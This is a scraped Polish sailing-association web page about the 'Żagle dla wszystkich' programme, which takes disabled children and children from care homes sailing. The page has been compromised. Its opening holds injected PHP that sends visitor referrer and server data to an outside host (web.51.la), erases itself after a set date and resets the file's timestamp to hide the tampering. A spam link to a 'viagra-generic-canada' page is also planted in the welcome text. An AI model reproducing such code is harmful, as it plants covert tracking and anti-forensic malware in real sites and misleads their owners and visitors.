check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Żagle dla wszystkich

Witamy na http://pozz.poznan.pl/viagra-generic-canada stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Żagle dla wszystkich

Wszyscy w naszym okręgu znają już ten program.Prowadzimy go wspólnie od 2002 roku. W tym roku prowadzimy program przy wsparciu środków z Urzędu Miasta Poznania. Ponadto chęć wsparcia wyraziły firmy i osoby fizyczne, na których jak dotąd się nie zawiedliśmy. Nie wątpię, że wszystkie kluby żeglarskie, które program ten realizowały dalej będą to czynić. A wszystko dla naszych najmłodszych często upośledzonych przez życie dzieciaków. Ktoś kiedyś powiedział że "człowiek jest tyle wart, ile może pomóc innym". My chcemy dzieciom pokazać żeglarstwo, pokazać to co najbardziej kochamy, pomóc im patrzeć na świat radosnymi oczami.

Program "Żagle dla Wszystkich" kierujemy przede wszystkim do dzieci i młodzieży niepełnosprawnej, dzieci z domów dziecka, rodzin zastępczych, ośrodków opiekuńczych i wychowawczych, szkół specjalnych. W każdym sezonie żeglarskim odbywa się kilkanaście imprez na terenie wielu klubów z Wielkopolski. Liczba dzieci uczestniczących w imprezach integracyjnych systematycznie rośnie. Zorganizowane grupy dzieci uczestniczą w regatach żeglarskich na specjalnie dla nich przygotowanych jachtach żaglowych oraz w zajęciach ze szkolenia żeglarskiego. Uczą się poznawać tajniki żeglarstwa oraz piękno naturalnego środowiska, tak charakterystyczne dla żeglarstwa. Każde dziecko otrzymuje okolicznościową koszulkę i dyplom uczestnictwa. Uczestniczące w imprezach dzieci, które na co dzień mają utrudniony kontakt z osobami trzecimi, otwierają się, nawiązują kontakt z instruktorami i pozostałymi dziećmi. Wspólne zajęcia mobilizują do otwartej zabawy, rozbudzają zainteresowanie tematem, dają wiele radości dzieciom i opiekunom ale także i instruktorom prowadzącym zajęcia. Wiele dzieci uczestniczy w regatach kilka lat z rzędu. W naszym kalendarzu jest już zaplanowanych 11 imprez, na które czekają nasi przyszli goście, ale kalendarz jest jeszcze otwarty.

Prosimy kluby, które chciałyby zorganizować kolejne imprezy o kontakt z kol. Jolą Polc tel. 665 858 335 lub biurem okręgu. Wszystkim instruktorom, żeglarzom, opiekunom, wychowawcom, którzy dotychczas uczestniczyli w imprezach bardzo dziękujemy i liczymy na jeszcze. Tegoroczny program uatrakcyjni nowa łódz żaglowa typu DZ, z której będziemy mogli korzystać już od początku sezonu.


zagle dla wszystkich
Łódz żaglowa typu DZ na Jeziorze Kierskim, pomocna przy realizacji programu "Żagle dla Wszystkich".